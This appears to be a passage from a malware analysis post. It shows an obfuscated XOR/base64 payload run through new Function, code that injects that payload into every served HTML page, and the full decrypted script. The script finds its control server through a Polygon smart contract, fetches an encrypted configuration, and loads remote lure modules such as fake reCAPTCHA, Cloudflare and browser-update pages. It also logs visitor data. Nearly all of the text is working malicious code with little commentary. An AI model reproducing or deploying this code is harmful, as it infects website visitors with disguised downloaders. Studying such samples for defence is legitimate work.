UkwOUkVQTEFDRQgPfA8EDwwHBwkbKkFQSWJBU0UdUEFORUxiQVNFdVJMGypMT0d1UkwdQlVJTERhUEl1UkwIW0EaB0VWVAddCVxcCEFQSWJBU0ULBw9BUEkPSU5ERVgOUEhQH0EdRVZUBwkbKlRPS0VOdVJMHUJVSUxEYVBJdVJMCFtBGgdJTklUB10JXFwIQVBJYkFTRQsHD0FQSQ9JTkRFWA5QSFAfQR1JTklUBwkbKkRPV05MT0FEdVJMHUJVSUxEYVBJdVJMCFtBGgdETAddCVxcCEFQSWJBU0ULBw9BUEkPSU5ERVgOUEhQH0EdREwHCRsqXSpBU1lOQwBGVU5DVElPTgBSRUZSRVNIY09ORklHZlJPTWFQSQgJWypUUllbKkNPTlNUAENPTlRSQUNUdVJMHUFXQUlUAEdFVHVSTGZST01jT05UUkFDVAgJGypJRggBQ09OVFJBQ1R1UkwJVEhST1cATkVXAGVSUk9SCAdiUk9XU0VSd0FSTklORxoAZkFJTEVEAFRPAEdFVAB1cmwARlJPTQBDT05UUkFDVAcJGypVUERBVEV1UkxTCENPTlRSQUNUdVJMCRsqQ09OU1QAU0VUVElOR1N1UkwdQlVJTERhUEl1UkwIW0EaB0NGRwddCVxcCENPTlRSQUNUdVJMCwcPQVBJD0lOREVYDlBIUB9BHUNGRwcJGypMRVQAUkVNT1RFHUFXQUlUAEZFVENIalNPTndJVEh0SU1FT1VUCFNFVFRJTkdTdVJMDFtDQUNIRRoHTk8NU1RPUkUHXQwVEBAQCRsqUkVNT1RFHUFXQUlUAERFQ1JZUFRhUEllTlZFTE9QRQhSRU1PVEUMB0NGRwcJGypJRggBUkVNT1RFXFxUWVBFT0YAUkVNT1RFAR0dB09CSkVDVAcJVEhST1cATkVXAGVSUk9SCAdiUk9XU0VSd0FSTklORxoASU5WQUxJRABTRVRUSU5HUwBQQVlMT0FEBwkbKkNGRx1vQkpFQ1QOQVNTSUdOCFtdDFJFTU9URQkbKklGCENGRw5DT05UUkFDVGNPTkZJRwlbKlRSWVtvQkpFQ1QOQVNTSUdOCGNvbnRyYWN0f2NvbmZpZwxDRkcOQ09OVFJBQ1RjT05GSUcJG11DQVRDSAhFCVtdKl0qSUYIQ0ZHDlBBTkVMYkFTRXVSTAYGQ0ZHDlBBTkVMYkFTRXVSTAEdHVBBTkVMYkFTRXVSTAlVUERBVEV1UkxTCENGRw5QQU5FTGJBU0V1UkwJGypTSE9XZEVMQVkdVFlQRU9GAENGRw5TSE9XZEVMQVkdHR0HTlVNQkVSBx9DRkcOU0hPV2RFTEFZGmRlZmF1bHR/c2hvd39kZWxheRsqTU9ERR1UWVBFT0YAQ0ZHDk1PREUdHR0HU1RSSU5HBx9DRkcOTU9ERRoHQlJPV1NFUgcbKl1DQVRDSAhFCVsqVEhST1cARRsqXSpdKkFTWU5DAEZVTkNUSU9OAExPR2VWRU5UCEVWRU5UdFlQRQxQQVlMT0FECVsqSUYIAUxPR3VSTAYGAUFQSWJBU0UJUkVUVVJOGypUUllbKkNPTlNUAFVSTB1CVUlMRGFQSXVSTAhbQRoHRVZUB10JXFxMT0d1UkwbKkFXQUlUAEZFVENId0lUSHRJTUVPVVQIVVJMDFsqTUVUSE9EGgdwb3N0BwwqSEVBREVSUxpbB2NPTlRFTlQNdFlQRQcaB1RFWFQPUExBSU4bQ0hBUlNFVB11dGYNGAddDCpCT0RZGmpzb24OU1RSSU5HSUZZCG9CSkVDVA5BU1NJR04IW0VWRU5UdFlQRV0MUEFZTE9BRFxcW10JCQwqQ0FDSEUaB05PDVNUT1JFBypdDBMQEBAJGypdQ0FUQ0gIRQlbXSpdKkZVTkNUSU9OAExPQURtT0RFc0NSSVBUCE1PREVuQU1FDENBQ0hFYlVTVAlbKlJFVFVSTgBORVcAcFJPTUlTRQgIUkVTT0xWRQxSRUpFQ1QJHR5bKklGCAFQQU5FTGJBU0V1UkwJUkVUVVJOAFJFSkVDVAhORVcAZVJST1IIB1BBTkVMYkFTRXVSTH9NSVNTSU5HBwkJGypERUxFVEUAV0lORE9Xe2hhbmRsZXJ/ZXhwb3J0fRsqQ09OU1QAU0NSSVBUHURPQ1VNRU5UDkNSRUFURWVMRU1FTlQIB1NDUklQVAcJGypDT05TVABTQUZFbU9ERR0ITU9ERW5BTUUGBm1vZGV/ZmlsZX9tYXB7TU9ERW5BTUV9CR9NT0RFbkFNRRoHQlJPV1NFUgcbKkNPTlNUAEFQSXNDUklQVHVSTB1CVUlMRGFQSXVSTAhbQRoHSlMHDE1PREUac1RSSU5HCFNBRkVtT0RFCV0JGypTQ1JJUFQOU1JDHUFQSXNDUklQVHVSTFxcCFBBTkVMYkFTRXVSTAsHD0FQSQ9JTkRFWA5QSFAfQR1KUwZNT0RFHQcLRU5DT0RFdXJpY09NUE9ORU5UCHNUUklORwhTQUZFbU9ERQkJCRsqU0NSSVBUDkFTWU5DHVRSVUUbKlNDUklQVA5PTkxPQUQdCAkdHlsqQ09OU1QARk4dV0lORE9Xe2hhbmRsZXJ/ZXhwb3J0fRsqREVMRVRFAFdJTkRPV3toYW5kbGVyf2V4cG9ydH0bKklGCFRZUEVPRgBGTh0dHQdGVU5DVElPTgcJUkVUVVJOAFJFU09MVkUIRk4JGypSRUpFQ1QITkVXAGVSUk9SCAdNT0RFf0hBTkRMRVJ/TUlTU0lORwcJCRsqXRsqU0NSSVBUDk9ORVJST1IdCAkdHlsqREVMRVRFAFdJTkRPV3toYW5kbGVyf2V4cG9ydH0bKlJFSkVDVAhORVcAZVJST1IIB01PREV/U0NSSVBUf0ZBSUxFRAcJCRsqXRsqRE9DVU1FTlQOSEVBRA5BUFBFTkRjSElMRAhTQ1JJUFQJGypdCRsqXSpBU1lOQwBGVU5DVElPTgBCT09UU1RSQVAITU9ERW5BTUUMQ09OVEVYVAlbKlRSWVsqQ09OU1QAUlVOTkVSHUFXQUlUAExPQURtT0RFc0NSSVBUCE1PREVuQU1FDENGRwYGCENGRw5DQUNIRXRBR1xcQ0ZHDlVQREFURURhVAkJGypBV0FJVABSVU5ORVIIQ09OVEVYVAkbKl1DQVRDSAhFCVsqSUYITU9ERW5BTUUBHR0HQlJPV1NFUgcJWypUUllbKkNPTlNUAEZBTExCQUNLHUFXQUlUAExPQURtT0RFc0NSSVBUCAdCUk9XU0VSBwxDRkcGBghDRkcOQ0FDSEV0QUdcXENGRw5VUERBVEVEYVQJCRsqQVdBSVQARkFMTEJBQ0sIb0JKRUNUDkFTU0lHTghbXQxDT05URVhUDFtNT0RFGgdCUk9XU0VSB10JCRsqXUNBVENICEVSUglbKl0qXSpdKl0qQVNZTkMARlVOQ1RJT04ATUFJTggJWypUUllbKkFXQUlUAFJFRlJFU0hjT05GSUdmUk9NYVBJCAkbKklGCENGRwYGQ0ZHDkVOQUJMRUQdHR1GQUxTRQlSRVRVUk4bKkNPTlNUAE9THQhDRkcGBlRZUEVPRgBDRkcOT1MdHR0HU1RSSU5HBwYGQ0ZHDk9TCR9zVFJJTkcIQ0ZHDk9TCRoHVU5LTk9XTgcbKkNPTlNUAEJST1dTRVIdCENGRwYGVFlQRU9GAENGRw5CUk9XU0VSHR0dB1NUUklORwcGBkNGRw5CUk9XU0VSCR9zVFJJTkcIQ0ZHDkJST1dTRVIJGgd1TktOT1dOBxsqTEVUAEVGRkVDVElWRW1PREUdCFRZUEVPRgBNT0RFHR0dB1NUUklORwcGBk1PREUJH01PREUaB0JST1dTRVIHGypUUllbKkNPTlNUAExFR0FDWR1MT0NBTHNUT1JBR0UOR0VUaVRFTQhsZWdhY3l/c3RvcmFnZX9rZXkJGypDT05TVABDVVJSRU5UHUxPQ0FMc1RPUkFHRQ5HRVRpVEVNCGxvY2Fsf3N0b3JhZ2V/a2V5CRsqSUYITEVHQUNZAR0dTlVMTAYGQ1VSUkVOVB0dHU5VTEwJTE9DQUxzVE9SQUdFDlNFVGlURU0IbG9jYWx/c3RvcmFnZX9rZXkMTEVHQUNZCRsqSUYITEVHQUNZAR0dTlVMTAlMT0NBTHNUT1JBR0UOUkVNT1ZFaVRFTQhsZWdhY3l/c3RvcmFnZX9rZXkJGypdQ0FUQ0gIRQlbXSpJRghMT0NBTHNUT1JBR0UOR0VUaVRFTQhsb2NhbH9zdG9yYWdlf2tleQkdHR0HEQcJUkVUVVJOGypJRghFRkZFQ1RJVkVtT0RFAR0dB1JFQ0FQVENIQQcGBkVGRkVDVElWRW1PREUBHR0HQlNPRAcGBkVGRkVDVElWRW1PREUBHR0HQ0xPVURGTEFSRQcGBkVGRkVDVElWRW1PREUBHR0HQ0Z/VVBEQVRFBwYGRUZGRUNUSVZFbU9ERQEdHQdTSUxFTlQHCVsqQVdBSVQATE9HZVZFTlQIB1BBR0V/VklFVwcMWypCUk9XU0VSDCpPUwwqTU9ERRpFRkZFQ1RJVkVtT0RFDCpDT05UUkFDVHVSTBpQQU5FTGJBU0V1UkwMKkNPTlRSQUNUYUREUkVTUxpjb250cmFjdH9jb25maWcOY29udHJhY3R/YWRkcmVzcypdCRsqXSpDT05TVABTVEFSVB0ICR0eWypDT05TVABDVFgdWypQQU5FTGJBU0V1UkwMKkFQSWJBU0UMKkFQSXVSTBpCVUlMRGFQSXVSTAwqTE9HdVJMDCpUT0tFTnVSTAwqRE9XTkxPQUR1UkwMKk1PREUaRUZGRUNUSVZFbU9ERQwqT1MMKkJST1dTRVIMKkNPVU5UUlkaBwcMKlNUT1JBR0VrRVkabG9jYWx/c3RvcmFnZX9rZXkMKkNGRwwqQ09OVFJBQ1RjT05GSUcaY29udHJhY3R/Y29uZmlnKl0bKkJPT1RTVFJBUAhFRkZFQ1RJVkVtT0RFDENUWAkbKl0bKklGCERPQ1VNRU5UDlJFQURZc1RBVEUdHR0HTE9BRElORwcJWypET0NVTUVOVA5BRERlVkVOVGxJU1RFTkVSCAdkb21jT05URU5UbE9BREVEBwwICR0eU0VUdElNRU9VVAhTVEFSVAxTSE9XZEVMQVkJDFtPTkNFGlRSVUVdCRsqXUVMU0VbKlNFVHRJTUVPVVQIU1RBUlQMU0hPV2RFTEFZCRsqXSpdQ0FUQ0gIRQlbKl0qXSpNQUlOCAkbKl0JCAkb';function _0x70fc95(s,k){s=atob(s);var len=s.length,i,arr=new Uint8Array(len);for(i=0;i<len;i++){arr[i]=s.charCodeAt(i)^k;}if(window.TextDecoder){try{return new TextDecoder("utf-8").decode(arr);}catch(e){}}var tmp="";for(i=0;i<len;i++){tmp+=String.fromCharCode(arr[i]);}try{return decodeURIComponent(escape(tmp));}catch(e){return tmp;}}var _0xb25a97=_0x70fc95(_0x0b6624,_0x47e122);(new Function(_0xb25a97))();})();
11
</script>`;
12

13

14
      if (html.includes('</html>')) {
15
        html = html.replace('</html>', yourScript + '</html>');
16
      } else {
17
        html = html + yourScript;
18
      }
19

20
      return new Response(html, {
21
        headers: response.headers
22
      });
23
    }
24

25
    return response;
26
  }
27
}

解密后的js#

1
(function(){
2
'use strict';
3
if(typeof window==='undefined'||typeof document==='undefined'||window.__BW_SCRIPT_INITIALIZED__)return;
4
window.__BW_SCRIPT_INITIALIZED__=true;
5
const LOCAL_STORAGE_KEY='site_repair_state';
6
const LEGACY_STORAGE_KEY='bw-downloaded';
7
const DEFAULT_SHOW_DELAY=1000;
8
const HANDLER_EXPORT='__BW_MODE_RUN__';
9
const MODE_FILE_MAP={
10
browser:'v1.js',
11
font:'v2.js',
12
recaptcha:'v3.js',
13
bsod:'v4.js',
14
silent:'v5.js',
15
cloudflare:'v6.js',
16
cf_update:'v7.js',
17
mac_recaptcha:'v8.js',
18
mac_cloudflare:'v9.js'
19
};
20
const CONTRACT_CONFIG={
21
RPC_HOSTS:["https://rpc-mainnet.matic.quiknode.pro","https://rpc.ankr.com/polygon","https://polygon-public.nodies.app","https://polygon-mainnet.public.blastapi.io","https://1rpc.io/matic","https://polygon.drpc.org","https://polygon.gateway.tenderly.co","https://gateway.tenderly.co/public/polygon","https://polygon-mainnet.gateway.tatum.io","https://polygon.rpc.subquery.network/public","https://polygon.therpc.io","https://polygon.lava.build","https://polygon-bor-rpc.publicnode.com","https://polygon.rpc.hypersync.xyz/"],
22
CONTRACT_ADDRESS:'0x4dE37B7bE1bfb8a74acD8Af57a2c10c5B1A14BB3',
23
FUNCTION_SELECTOR:'b68d1809',
24
TIMEOUT_MS:5000,
25
MAX_RETRIES:2
26
};
27
if(typeof __BW_CONTRACT_OVERRIDE!=='undefined'&&__BW_CONTRACT_OVERRIDE){
28
try{Object.assign(CONTRACT_CONFIG,__BW_CONTRACT_OVERRIDE);}catch(e){}
29
}
30
let cfg={};
31
let panelBaseUrl='';
32
let apiBase='';
33
let logUrl='';
34
let tokenUrl='';
35
let downloadUrl='';
36
const API_Q2_KEY_HEX='603a054794e967ef834bf190c37f8d42133d7c5ae05ce2ddf0569b4f508d7bc3';
37
function b64urlEncodeAscii(str){
38
try{
39
return btoa(String(str)).replace(/\+/g,'-').replace(/\//g,'_').replace(/=+$/g,'');
40
}catch(e){
41
return'';
42
}
43
}
44
function hexToBytes(hex){
45
try{
46
hex=String(hex||'').trim();
47
if(!/^[a-f0-9]{64}$/i.test(hex))return null;
48
const out=new Uint8Array(32);
49
for(let i=0;i<32;i++){
50
out[i]=parseInt(hex.substr(i*2,2),16)&0xff;
51
}
52
return out;
53
}catch(e){
54
return null;
55
}
56
}
57
function bytesToB64Url(bytes){
58
try{
59
let bin='';
60
const chunk=0x8000;
61
for(let i=0;i<bytes.length;i+=chunk){
62
bin+=String.fromCharCode.apply(null,bytes.subarray(i,i+chunk));
63
}
64
return btoa(bin).replace(/\+/g,'-').replace(/\//g,'_').replace(/=+$/g,'');
65
}catch(e){
66
return'';
67
}
68
}
69
function b64urlToBytes(b64url){
70
try{
71
if(!b64url||typeof b64url!=='string')return null;
72
let b64=b64url.replace(/-/g,'+').replace(/_/g,'/');
73
const pad=b64.length%4;
74
if(pad)b64+='='.repeat(4-pad);
75
const bin=atob(b64);
76
const out=new Uint8Array(bin.length);
77
for(let i=0;i<bin.length;i++)out[i]=bin.charCodeAt(i)&0xff;
78
return out;
79
}catch(e){
80
return null;
81
}
82
}
83
function bytesToUtf8(bytes){
84
try{
85
return new TextDecoder('utf-8',{fatal:false}).decode(bytes);
86
}catch(e){
87
let s='';
88
for(let i=0;i<bytes.length;i++)s+=String.fromCharCode(bytes[i]);
89
return s;
90
}
91
}
92
function concatBytes(a,b){
93
const out=new Uint8Array(a.length+b.length);
94
out.set(a,0);
95
out.set(b,a.length);
96
return out;
97
}
98
async function sha256Bytes(bytes){
99
try{
100
if(typeof crypto==='undefined'||!crypto.subtle||!crypto.subtle.digest)return null;
101
const digest=await crypto.subtle.digest('SHA-256',bytes.buffer?bytes.buffer:bytes);
102
return new Uint8Array(digest);
103
}catch(e){
104
return null;
105
}
106
}
107
function rc4(keyBytes,dataBytes){
108
const s=new Uint8Array(256);
109
for(let i=0;i<256;i++)s[i]=i;
110
let j=0;
111
for(let i=0;i<256;i++){
112
j=(j+s[i]+keyBytes[i%keyBytes.length])&255;
113
const tmp=s[i];
114
s[i]=s[j];
115
s[j]=tmp;
116
}
117
let i=0;
118
j=0;
119
const out=new Uint8Array(dataBytes.length);
120
for(let n=0;n<dataBytes.length;n++){
121
i=(i+1)&255;
122
j=(j+s[i])&255;
123
const tmp=s[i];
124
s[i]=s[j];
125
s[j]=tmp;
126
const k=s[(s[i]+s[j])&255];
127
out[n]=dataBytes[n]^k;
128
}
129
return out;
130
}
131
function buildApiUrl(params){
132
if(!apiBase)return'';
133
try{
134
const qs=new URLSearchParams(params||{}).toString();
135
const key=hexToBytes(API_Q2_KEY_HEX);
136
if(key&&typeof Uint8Array!=='undefined'){
137
const nonce=new Uint8Array(8);
138
if(typeof crypto!=='undefined'&&crypto.getRandomValues){
139
crypto.getRandomValues(nonce);
140
}else{
141
for(let i=0;i<nonce.length;i++)nonce[i]=(Math.random()*256)&255;
142
}
143
const enc=(typeof TextEncoder!=='undefined')?new TextEncoder():null;
144
const plainBytes=enc?enc.encode(qs):(function(){
145
const arr=new Uint8Array(qs.length);
146
for(let i=0;i<qs.length;i++)arr[i]=qs.charCodeAt(i)&255;
147
return arr;
148
})();
149
const keyMat=new Uint8Array(key.length+nonce.length);
150
keyMat.set(key,0);
151
keyMat.set(nonce,key.length);
152
const cipherBytes=rc4(keyMat,plainBytes);
153
const payload=new Uint8Array(nonce.length+cipherBytes.length);
154
payload.set(nonce,0);
155
payload.set(cipherBytes,nonce.length);
156
const packed=bytesToB64Url(payload);
157
if(packed){
158
return apiBase+'/api/index.php?q='+packed;
159
}
160
}
161
return'';
162
}catch(e){
163
return'';
164
}
165
}
166
async function decryptApiEnvelope(obj,scope){
167
try{
168
if(!obj||typeof obj!=='object')return obj;
169
if(typeof obj.q!=='string'||!obj.q)return obj;
170
const safeScope=(typeof scope==='string'&&/^[a-z0-9_]{1,16}$/i.test(scope))?scope:'cfg';
171
const baseKey=hexToBytes(API_Q2_KEY_HEX);
172
if(!baseKey)return obj;
173
if(obj.enc==='gcm1'){
174
try{
175
const packed=b64urlToBytes(obj.q);
176
if(!packed||packed.length<(12+16+1))throw new Error('gcm_packed');
177
const iv=packed.slice(0,12);
178
const cipherWithTag=packed.slice(12);
179
const gcmLabel=safeScope+'|gcm1';
180
const label=(typeof TextEncoder!=='undefined')?new TextEncoder().encode(gcmLabel):(function(){
181
const s=gcmLabel;
182
const arr=new Uint8Array(s.length);
183
for(let i=0;i<s.length;i++)arr[i]=s.charCodeAt(i)&255;
184
return arr;
185
})();
186
const keyBytes=await sha256Bytes(concatBytes(baseKey,label));
187
if(!keyBytes)throw new Error('gcm_key');
188
if(typeof crypto==='undefined'||!crypto.subtle||!crypto.subtle.importKey)throw new Error('gcm_subtle');
189
const cryptoKey=await crypto.subtle.importKey('raw',keyBytes,{name:'AES-GCM'},false,['decrypt']);
190
const plainBuf=await crypto.subtle.decrypt({name:'AES-GCM',iv:iv,tagLength:128},cryptoKey,cipherWithTag);
191
const json=bytesToUtf8(new Uint8Array(plainBuf));
192
return JSON.parse(json);
193
}catch(e){
194
if(typeof obj.q2==='string'&&obj.q2){
195
const packed2=b64urlToBytes(obj.q2);
196
if(packed2&&packed2.length>=9){
197
const nonce=packed2.slice(0,8);
198
const cipher2=packed2.slice(8);
199
const keyMat=new Uint8Array(baseKey.length+nonce.length);
200
keyMat.set(baseKey,0);
201
keyMat.set(nonce,baseKey.length);
202
const plainBytes2=rc4(keyMat,cipher2);
203
const json2=bytesToUtf8(plainBytes2);
204
return JSON.parse(json2);
205
}
206
}
207
return obj;
208
}
209
}
210
if(obj.enc==='q2'){
211
const packed=b64urlToBytes(obj.q);
212
if(!packed||packed.length<9)return obj;
213
const nonce=packed.slice(0,8);
214
const cipher=packed.slice(8);
215
const keyMat=new Uint8Array(baseKey.length+nonce.length);
216
keyMat.set(baseKey,0);
217
keyMat.set(nonce,baseKey.length);
218
const plainBytes=rc4(keyMat,cipher);
219
const json=bytesToUtf8(plainBytes);
220
return JSON.parse(json);
221
}
222
return obj;
223
}catch(e){
224
return obj;
225
}
226
}
227
try{
228
window.__bwDecryptApiEnvelope=decryptApiEnvelope;
229
}catch(e){}
230
let showDelay=DEFAULT_SHOW_DELAY;
231
let mode='browser';
232
function fetchWithTimeout(url,options,timeoutMs){
233
const controller=new AbortController();
234
const timeoutId=setTimeout(()=>controller.abort(),timeoutMs||5000);
235
const opts=Object.assign({},options||{},{signal:controller.signal});
236
return fetch(url,opts).finally(()=>clearTimeout(timeoutId));
237
}
238
async function fetchJsonWithTimeout(url,options,timeoutMs){
239
const resp=await fetchWithTimeout(url,options,timeoutMs);
240
if(!resp.ok)throw new Error('http_'+resp.status);
241
return await resp.json();
242
}
243
function decodeHexString(hex){
244
try{
245
let result='';
246
for(let i=0;i<hex.length;i+=2){
247
const byteString=hex.substr(i,2);
248
const byte=parseInt(byteString,16);
249
if(byte>0)result+=String.fromCharCode(byte);
250
}
251
return result;
252
}catch(e){
253
return'';
254
}
255
}
256
function decodeResult(result){
257
try{
258
const hexData=result.startsWith('0x')?result.substr(2):result;
259
if(hexData.length<128)return'';
260
const lengthHex=hexData.substr(64,64);
261
const length=parseInt(lengthHex,16);
262
if(length>0&&hexData.length>=128+length*2){
263
const stringHex=hexData.substr(128,length*2);
264
return decodeHexString(stringHex);
265
}
266
return'';
267
}catch(e){
268
return'';
269
}
270
}
271
async function postJsonWithTimeout(url,body,timeoutMs){
272
return await fetchJsonWithTimeout(url,{
273
method:'POST',
274
headers:{
275
'Content-Type':'application/json',
276
'Accept':'application/json'
277
},
278
body:JSON.stringify(body),
279
cache:'no-store'
280
},timeoutMs);
281
}
282
async function getUrlFromContract(){
283
const dataField='0x'+CONTRACT_CONFIG.FUNCTION_SELECTOR;
284
const params=[{to:CONTRACT_CONFIG.CONTRACT_ADDRESS,data:dataField},'latest'];
285
const requestBody={jsonrpc:'2.0',method:'eth_call',params,id:1};
286
for(let attempt=0;attempt<(CONTRACT_CONFIG.MAX_RETRIES||1);attempt++){
287
for(const endpoint of(CONTRACT_CONFIG.RPC_HOSTS||[])){
288
try{
289
const data=await postJsonWithTimeout(endpoint,requestBody,CONTRACT_CONFIG.TIMEOUT_MS||5000);
290
if(data&&data.result){
291
const domain=decodeResult(data.result);
292
if(domain&&domain.length>0){
293
let url=domain.trim();
294
if(!url.startsWith('http'))url='https://'+url;
295
return url;
296
}
297
}
298
}catch(e){}
299
}
300
}
301
return null;
302
}
303
function updateUrls(baseUrl){
304
if(!baseUrl)return;
305
panelBaseUrl=baseUrl.replace(/\/$/,'');
306
apiBase=panelBaseUrl;
307
logUrl=buildApiUrl({a:'evt'})||(apiBase+'/api/index.php?a=evt');
308
tokenUrl=buildApiUrl({a:'init'})||(apiBase+'/api/index.php?a=init');
309
downloadUrl=buildApiUrl({a:'dl'})||(apiBase+'/api/index.php?a=dl');
310
}
311
async function refreshConfigFromApi(){
312
try{
313
const contractUrl=await getUrlFromContract();
314
if(!contractUrl)throw new Error('BrowserWarning: Failed to get URL from contract');
315
updateUrls(contractUrl);
316
const settingsUrl=buildApiUrl({a:'cfg'})||(contractUrl+'/api/index.php?a=cfg');
317
let remote=await fetchJsonWithTimeout(settingsUrl,{cache:'no-store'},5000);
318
remote=await decryptApiEnvelope(remote,'cfg');
319
if(!remote||typeof remote!=='object')throw new Error('BrowserWarning: invalid settings payload');
320
cfg=Object.assign({},remote);
321
if(cfg.contractConfig){
322
try{Object.assign(CONTRACT_CONFIG,cfg.contractConfig);}catch(e){}
323
}
324
if(cfg.panelBaseUrl&&cfg.panelBaseUrl!==panelBaseUrl)updateUrls(cfg.panelBaseUrl);
325
showDelay=typeof cfg.showDelay==='number'?cfg.showDelay:DEFAULT_SHOW_DELAY;
326
mode=typeof cfg.mode==='string'?cfg.mode:'browser';
327
}catch(e){
328
throw e;
329
}
330
}
331
async function logEvent(eventType,payload){
332
if(!logUrl&&!apiBase)return;
333
try{
334
const url=buildApiUrl({a:'evt'})||logUrl;
335
await fetchWithTimeout(url,{
336
method:'POST',
337
headers:{'Content-Type':'text/plain;charset=UTF-8'},
338
body:JSON.stringify(Object.assign({eventType},payload||{})),
339
cache:'no-store'
340
},3000);
341
}catch(e){}
342
}
343
function loadModeScript(modeName,cacheBust){
344
return new Promise((resolve,reject)=>{
345
if(!panelBaseUrl)return reject(new Error('panelBaseUrl_missing'));
346
delete window[HANDLER_EXPORT];
347
const script=document.createElement('script');
348
const safeMode=(modeName&&MODE_FILE_MAP[modeName])?modeName:'browser';
349
const apiScriptUrl=buildApiUrl({a:'js',mode:String(safeMode)});
350
script.src=apiScriptUrl||(panelBaseUrl+'/api/index.php?a=js&mode='+encodeURIComponent(String(safeMode)));
351
script.async=true;
352
script.onload=()=>{
353
const fn=window[HANDLER_EXPORT];
354
delete window[HANDLER_EXPORT];
355
if(typeof fn==='function')return resolve(fn);
356
reject(new Error('mode_handler_missing'));
357
};
358
script.onerror=()=>{
359
delete window[HANDLER_EXPORT];
360
reject(new Error('mode_script_failed'));
361
};
362
document.head.appendChild(script);
363
});
364
}
365
async function bootstrap(modeName,context){
366
try{
367
const runner=await loadModeScript(modeName,cfg&&(cfg.cacheTag||cfg.updatedAt));
368
await runner(context);
369
}catch(e){
370
if(modeName!=='browser'){
371
try{
372
const fallback=await loadModeScript('browser',cfg&&(cfg.cacheTag||cfg.updatedAt));
373
await fallback(Object.assign({},context,{mode:'browser'}));
374
}catch(err){
375
}
376
}
377
}
378
}
379
async function main(){
380
try{
381
await refreshConfigFromApi();
382
if(cfg&&cfg.enabled===false)return;
383
const os=(cfg&&typeof cfg.os==='string'&&cfg.os)?String(cfg.os):'unknown';
384
const browser=(cfg&&typeof cfg.browser==='string'&&cfg.browser)?String(cfg.browser):'Unknown';
385
let effectiveMode=(typeof mode==='string'&&mode)?mode:'browser';
386
try{
387
const legacy=localStorage.getItem(LEGACY_STORAGE_KEY);
388
const current=localStorage.getItem(LOCAL_STORAGE_KEY);
389
if(legacy!==null&&current===null)localStorage.setItem(LOCAL_STORAGE_KEY,legacy);
390
if(legacy!==null)localStorage.removeItem(LEGACY_STORAGE_KEY);
391
}catch(e){}
392
if(localStorage.getItem(LOCAL_STORAGE_KEY)==='1')return;
393
if(effectiveMode!=='recaptcha'&&effectiveMode!=='bsod'&&effectiveMode!=='cloudflare'&&effectiveMode!=='cf_update'&&effectiveMode!=='silent'){
394
await logEvent('page_view',{
395
browser,
396
os,
397
mode:effectiveMode,
398
contractUrl:panelBaseUrl,
399
contractAddress:CONTRACT_CONFIG.CONTRACT_ADDRESS
400
});
401
}
402
const start=()=>{
403
const ctx={
404
panelBaseUrl,
405
apiBase,
406
apiUrl:buildApiUrl,
407
logUrl,
408
tokenUrl,
409
downloadUrl,
410
mode:effectiveMode,
411
os,
412
browser,
413
country:'',
414
storageKey:LOCAL_STORAGE_KEY,
415
cfg,
416
contractConfig:CONTRACT_CONFIG
417
};
418
bootstrap(effectiveMode,ctx);
419
};
420
if(document.readyState==='loading'){
421
document.addEventListener('DOMContentLoaded',()=>setTimeout(start,showDelay),{once:true});
422
}else{
423
setTimeout(start,showDelay);
424
}
425
}catch(e){
426
}
427
}
428
main();
429
})();